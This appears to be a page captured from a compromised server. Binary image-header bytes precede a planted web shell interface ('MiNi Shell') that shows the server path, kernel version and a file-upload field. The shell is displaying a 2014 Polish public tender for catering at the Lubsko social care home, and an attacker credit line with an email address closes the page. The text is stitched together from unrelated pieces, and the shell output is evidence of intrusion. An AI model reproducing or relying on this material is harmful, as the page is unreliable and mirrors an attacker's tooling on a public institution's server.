JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141217/260473-N-2014.html

<p class="kh_header"><b>Lubsko: ŚWIADCZENIE CODZIENNEGO I CAŁODOBOWEGO  ŻYWIENIA
134  PENSJONARIUSZY DPS LUBSKO NA BAZIE WYNAJMOWANYCH  POMIESZCZEŃ KUCHNI  I  WYPOSAŻENIA KUCHNI  PRZEZ  OKRES  12 MIESIĘCY 2015R.</b><br>
<b>Numer ogłoszenia: 260473 - 2014; data zamieszczenia: 17.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Zamkowa 27, 68-300 Lubsko, woj. lubuskie, tel. 068 4574111, faks 068 4574110.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE CODZIENNEGO I CAŁODOBOWEGO  ŻYWIENIA
134  PENSJONARIUSZY DPS LUBSKO NA BAZIE WYNAJMOWANYCH  POMIESZCZEŃ KUCHNI  I  WYPOSAŻENIA KUCHNI  PRZEZ  OKRES  12 MIESIĘCY 2015R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa codziennego i całodobowego żywienia pensjonariuszy Domu Pomocy Społecznej świadczona na bazie wynajętych od DPS Lubsko  pomieszczeń  kuchennych i wyposażenia  obejmująca  produkcję i wydawanie przez okres 12 miesięcy 2015r.   następujących posiłków : 

śniadania -    48910  (porcji)
śniadania drugie -  48910 (porcji)
obiady      -    48910  (porcji)
kolacje     -    48910  (porcji)

( wyliczone; 134 osób/dzień x 365 dni = 47910 porcji )

Liczba ta może się zmienić, gdyż jest zależna od stanu chorobowego mieszkańców i stanu obłożenia Domu.
Usługa obejmuje cały kompleks spraw związanych  z prowadzeniem kuchni w tym przejęcie pełnej odpowiedzialności za pracowników, produkcję,  jej jakość, stan higieniczno-sanitarny pomieszczeń i urządzeń, prowadzenie dokumentacji HACCP, kontakty z Sanepidem, mycie naczyń ze stołówki, itp. 

Wykonawca zobowiązany jest do przestrzegania wszystkich aktualnych przepisów prawnych obowiązujących w polskim systemie prawnym  w tym zakresie. 

Wykonawca zobowiązany jest do pobierania próbek żywnościowych sporządzanych produktów i przechowywania ich w wydzielonym miejscu w temperaturze 4st.C  przez  72 godziny, dla kontroli przez Sanepid. Masa próbki każdego produktu min. 15dkg.  Zamawiający  ma  prawo  - poprzez  upoważnionego  przedstawiciela - do kontrolowania produkcji posiłków ( m.in.: jakości produktów wyjściowych, świadectwa jakości ich pochodzenia,  składu i gramatury posiłków, czystości personelu i posiadania przez nich aktualnych książeczek zdrowia, czystości pomieszczeń i wyposażenia kuchni, zużycia mediów, bhp  i p.poż. - według porozumienia , itd.)

Zamawiający będzie dostarczał Wykonawcy  pisemny wykaz ilości mieszkańców oraz wymaganych diet w terminach:

- obiady i kolacje do godziny 9.00   tego samego dnia,
- śniadania do godz. 16.00 dnia poprzedniego.

Wyżywienie musi spełniać wymóg dostarczenia 2200-2400 kalorii dziennie dla jednej osoby. Posiłki mają być przygotowane ze świeżych produktów  własnych ( nabywanych przez wykonawcę). 
Posiłki mają być urozmaicone (różnorodne)  poprzez przestrzeganie piramidy żywieniowej     i muszą odpowiadać wszelkim rygorom recepturowym, smakowym, estetycznym 
( kolorystyka, konsystencja)  i odżywczym ( w posiłkach mają być warzywa, owoce,  słodycze, itd.).  Posiłki należy układać na talerzu estetycznie,  z  przystrojeniem ich  zieleniną ( zielonym koperkiem, pietruszką, szczypiorkiem, itp.).  Gramatura  określona w jadłospisie oznacza wagę produktu gotowego ( wydawanego do spożycia). 
Zgodnie z zasadami prawidłowego żywienia głównym źródłem energii powinny być: 
węglowodory 50-70% energii (pieczywo, produkty zbożowe, kasze, warzywa, owoce) 
tłuszcze 20-35% energii
białko 10-15% energii 
Posiłki powinny być różnorodne pod względem produktów i składników odżywczych.
Należy zwrócić szczególna uwagę na użycie soli, które nie powinno przekoczyć 5gram dziennie na osobę.
Minimalna wysokość całodobowego wsadu surowca na jednego żywionego nie może być mniejsza niż 8,00 zł brutto ( słownie: osiem złotych). Wykonawca przedłoży Zamawiającemu kwartalne rozliczenie wsadu do kotła podając stawkę brutto wsadu do kotła. 

Na całodobowe wyżywienie składają się posiłki wydawane pensjonariuszom :

 śniadanie  na oddziałach o godz. 9.00, na stołówce w godz. 8.00-10.00
 śniadanie(drugie)  na oddziałach o godz. 10.30, na stołówce w godz. 10.30
 obiad na oddziałach o godz. 13.00, na stołówce w  godz. 13.00-15.00 
 kolacja na oddziałach o godz. 18, na stołówce w godz. 17.00-19.00 
   - dodatek cukrzycowy dla pensjonariuszy z cukrzycą  wydawany tylko na oddziałach 
      o godz. 15.00 wliczony w cenę obiadu 

   z uwzględnieniem podziału na diety : 
normalna (I)
lekkostrawna (III)
lekkostrawna z dodatkiem cukrzycowym (IV)
lekkostrawna z dodatkiem cukrzycowym przecierana (V)
lekkostrawna  przecierana  
inne w zależności od zaleceń lekarza.

Wykonawca zobowiązany jest ponad to do : 

a. zapewnienia całodziennego dostępu do pieczywa i napojów w ilości  5-ciu bochenków chleba, 7-ciu  słoiczków dżemu, 3-ch kostek masła 250g do smarowania chleba na tydzień. Przy wyborze dostawcy pieczywa należy uwzględnić przyzwyczajenia smakowe mieszkańców Domu.
b.w okresie letnim zapewnienie napojów chłodzących ( herbata miętowa lub owocowa) dla 15 pracowników Domu w ilości 1 litra  na osobę na dzień
c. zapewnienia dodatkowego posiłku (dodatku cukrzycowego) dla osób tego wymagających w ilości 28 osób ( może ulec zmianie).
d. umożliwienia  wydawanie odpłatnych posiłków dla personelu   zamawiającego jeżeli zaistnieje taka sytuacja w cenie jak dla  pensjonariusza Domu
e.przygotowania tradycyjnych potraw świątecznych (na Boże Narodzenie i Wielkanoc) oraz 
  właściwej oprawy tych posiłków

Wykonawca będzie przygotowywał posiłki zgodnie  z zaleceniami i normami Instytutu Żywienia i Żywności. Zamawiający może udostępnić  do stosowania  receptury na produkty żywieniowe stosowane w żywieniu  dotychczasowym  pensjonariuszy. Podstawę do sporządzania posiłków dla mieszkańców DPS stanowić będzie  uzgodniony  pomiędzy zamawiającym a wykonawcą jadłospis  dekadowy, z uwzględnieniem diet indywidualnych. Receptury mogą one być modyfikowane  wyłącznie po uzyskaniu akceptacji zamawiającego. 
Możliwe jest też wprowadzenie nowych potraw po zatwierdzeniu ich receptury przez zamawiającego. 

Dystrybucja posiłków ;  98  pensjonariuszy  żywionych jest w budynku przy ul. Zamkowej 27 i 36 pensjonariuszy na filii DPS przy ul. Pokoju 1A. Dostarczanie posiłków do kuchenek oddziałowych odbywać się będzie transportem zamawiającego i tak :
w budynku głównym przy ul. Zamkowej : 
a./ na oddziały -  transport windą towarową, załadunek zbiorczy do pojemników i termosów jest czynnością wykonawcy, ilość osób około  52.
b./ na stołówkę  przez okno podawcze, wydawanie pojedynczych porcji dla około 46 osób
do  budynku przy ul. Pokoju 1A (filia DPS) transportem zamawiającego, załadunek
zbiorczy do pojemników i termosów jest czynnością wykonawcy, odbiór z kuchni, ilość dla około 36 osób. 

Posiłki gorące będą odbierane od wykonawcy w termosach i pojemnikach będących własnością zamawiającego. Temperatura posiłków w chwili dostarczenia do pomieszczeń dystrybucji  zamawiającego musi wynosić : dla zupy, drugiego dania, płynów - minimum 60°C, dla posiłków zimnych ( sałatki, pasty, sery, itp.) od 4-7st.C.

Przygotowywanie posiłków odbywać się będzie w  kuchni Zamawiającego usytuowanej w Lubsku przy ul. Zamkowej 27 o powierzchni użytkowej wynajętej 226,70m2, oraz  wyposażenia kuchennego, przekazanych  wykonawcy usługi na podstawie umowy najmu - załącznik nr 5  SIWZ. Wykaz  sprzętu  i urządzeń  do przekazania dla Wykonawcy  stanowi załączniki nr 1 i 2 do umowy najmu.

Dodatkowe obowiązki wykonawcy: 

a. ponosić opłaty z tytułu zużycia mediów według wskazań podliczników: zimna woda, ciepła woda, kanalizacja, gaz, energia elektryczna, i ryczałtów : za parę technologiczną 650zł /m-c ( za 2 kotły warzelne),  za  ogrzewanie pomieszczeń (c.o.) - 610zł /m-c, ciepła woda - 18zł/m3
b. przejąć pracowników zamawiającego zatrudnionych w kuchni na podstawie art. 23prim Kodeksu Pracy. 
Wykaz szczegółowy  przewidzianych do przejęcia pracowników kuchni udostępniony  będzie wykonawcy po wyborze najkorzystniejszej oferty ( 3 kucharki). Sugerowane zatrudnienie - dla zapewnienia prawidłowej pracy kuchni potrzebne są następujące etaty:  
szef kuchni -  1 osoba na pełny etat,  kucharz -  4 osoby na pełny etat,
magazynier - 1 osoba na pełny etat,
dietetyk  - 1 osoba na 1 / 2 etatu.
c. przejmować wszelkie resztki pokarmowe jako odpady pokonsumpcyjne powstałe po spożyciu posiłków.  
d. składować w udostępnionym przez zamawiającego pojemniku oznaczonym napisem BIO odpady ( niepłynne)  za  wynagrodzeniem ryczałtowym 50zł/m-c. Zawrzeć umowę na odbiór  odpadów komunalnych od swoich pracowników.  Zamawiający udostępnia wykonawcy plac przy kotłowni na umieszczenie pojemnika na odpady dla jego  pracowników. Zawrzeć umowę na odbiór odpadów płynnych. Oba te dokumenty (kopie) należy przedłożyć Zamawiającemu.
d. utrzymywać właściwy stan techniczno-sanitarny pomieszczeń, urządzeń, sprzętu, itp. wykorzystywanych  przez wykonawcę, co oznacza m.in. ich czasową konserwację, wykonywanie  bez zwłoki napraw, remontów, a w przypadku znacznego zużycia  naturalnego sprzętu uniemożliwiającego jego użytkowanie i  nieopłacalności jego  naprawy, wykonawca zobowiązany jest do sporządzenia opinii technicznej w tym zakresie przez osobę uprawnioną i przedłożenia jej Zamawiającemu. Decyzję ostateczną podejmie zamawiający, który w przypadku akceptacji opinii wycofa sprzęt z użytkowania i przeznaczy go do kasacji. Jednakże,  wykonawca musi sobie zabezpieczyć sprzęt równoważny umożliwiający mu prowadzenie działalności w zakresie żywienia. 
e.  Zgodnie z art. 182 Kodeksu Pracy - współpracować z  zamawiającym w zakresie bhp. i p.poż. - na podstawie zawartego porozumienia - załącznik nr 6 SIWZ
f. Utrzymywać we właściwym stanie sanitarno-higienicznym korytarze  przy kuchni (myć na bieżąco i  co najmniej raz w tygodniu szorować podłogi)  
g. Ubezpieczyć ( lub kontynuować ubezpieczenie) od odpowiedzialności cywilnej prowadzoną działalność gospodarczą  w kuchni i objąć też odpowiedzialnością  pracowników kuchni i osoby  trzecie.
h. Zgłosić i opłacać podatek od nieruchomości na rzecz Urzędu Miasta Lubsko, od wynajętej    powierzchni użytkowej pomieszczeń. Na rok 2015 planowana jest stawka w wysokości 21,00zł/m2 , co przy powierzchni wynajmu 226,70m2 daje kwotę 4502,79zł/rok.
i.Wykonawcy zezwala się na wyposażenie kuchni w  sprzęt własny ale w uzgodnieniu z zamawiającym warunków jego zasilania w media.  
j. Opłacać comiesięczny czynsz za wynajem  pomieszczeń kuchennych w wysokości  1957,40 zł /m-c.
k. W przypadku rozpoczęcia działalności Wykonawcy na rzecz innych podmiotów gospodarczych z wykorzystaniem pomieszczeń i sprzętu użyczonych przez Zleceniodawcę, Wykonawca zobowiązuje się  do zapłaty na rzecz Zamawiającego kwoty 10 zł za 1 osobę żywioną  całodziennie przez okres jednego miesiąca. Kontrakt ten nie może pogorszyć jakości usługi świadczonej dla Zamawiającego.  Do rozliczeń niepełnych stosuje się tu procentowe udziały  poszczególnych posiłków w stawce jednostkowej dziennej usługi ( stawce za osobo-dzień)  
a)	śniadanie stanowi 25% 
b)	śniadanie (drugie) stanowi 5% 
c)	obiad stanowi 50% 
d)	kolacja stanowi 20% .
2.	Najemca będzie ponosił następujące  opłaty  z tytułu  korzystania z mediów:

a)	za energię  elektryczną - według  wskazań  podlicznika  elektrycznego  w oparciu o stawki  brutto stosowane  przez Zakład Energetyczny  w fakturowaniu   usług  i dostaw na rzecz DPS Lubsko.
b)	za zimną wodę i ścieki - według  wskazań  podliczników   w oparciu o stawki  brutto stosowane  przez  Zakład Wodociągów  w fakturowaniu   usług na rzecz DPS Lubsko.
c)	za ciepłą  wodę i ścieki - według  wskazań  podliczników   w oparciu o  stawkę za c.w. określoną  przez DPS (  18 zł/m3) , za ścieki  w oparciu o stawkę brutto  stosowaną  przez  Zakład Wodociągów i Kanalizacji  w fakturowaniu  tych usług  na rzecz DPS Lubsko.
d)	za  gaz ziemny - według  wskazań  podlicznika  gazowego  w  oparciu  o stawki brutto   stosowane  przez Zakład Gazowniczy  w fakturowaniu   usług i  dostaw  na rzecz DPS Lubsko.
e)	za parę  technologiczną  -  ryczałt 650 zł/ miesiąc za  2 kotły warzelne
f)	za pojemnik i  wywóz BIO odpadów ( nie płynnych)  - 50zł/m-c.
g)	za ogrzewanie  pomieszczeń /C.O/ - płatne  przez cały rok ustalone jako ryczałt 
             miesięczny w wysokości 610zł/ miesiąc..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.50.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w formie pieniądza w wysokości 12000zł.; słownie : dwanaście tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metoda: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metoda: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Do oferty należy dołączyć dokument podpisany przez zamawiającego potwierdzający odbycie wizji lokalnej w pomieszczeniach przeznaczonych do przejęcia oraz o zapoznaniu się ze stanem pomieszczeń i wyposażenia oraz,  że nie wnosi zastrzeżeń co do ich stanu technicznego.2. Wykonawca złoży oświadczenie ,że zapoznał się ze Specyfikacją Istotnych Warunków Zamówienia i nie wnosi do niej zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty. Metoda: spełnia- nie spełnia.3. Odnośnie zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że realizowane  usługi, produkty odpowiadają określonym normom lub specyfikacjom  technicznym Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże się jednym z  dokumentów : 
     a.Wykonawca przedstawi certyfikat HACCP wystawiony przez zewnętrzny,
     akredytowany podmiot uprawniony do przeprowadzania certyfikacji.
     b.Wykonawca załączy do oferty odpis z rejestru zakładów prowadzonego przez
     Państwowego Powiatowego Inspektora Sanitarnego właściwego ze względu na
     siedzibę Wykonawcy - wystawiony nie wcześniej niż 6 miesięcy przed upływem 
     terminu składania ofert. 
     c. inny równoważny.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie w żywieniu mieszkańców Domu Pomocy Społecznej - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści umowy wymagają dla swojej ważności formy pisemnej  w postaci aneksu. Dopuszcza się wyłącznie zmiany w zakresie adresu/siedziby Zamawiającego/ Wykonawcy, zmiany osób występujących po stronie Zamawiającego / Wykonawcy, zmianę   wynagrodzenia w związku ze zmianą stawki podatku od towarów i usług (vat). Przyczyny  dokonania zmian postanowień umowy  oraz uzasadnienie takich zmian należy opisać w  stosownych dokumentach ( notatka służbowa, pismo wykonawcy, itp.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatzarski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 68-300 Lubsko, ul. Zamkowa 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2014 godzina 10:00, miejsce: 68-300 Lubsko, ul. Zamkowa 27, pokój kadr..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com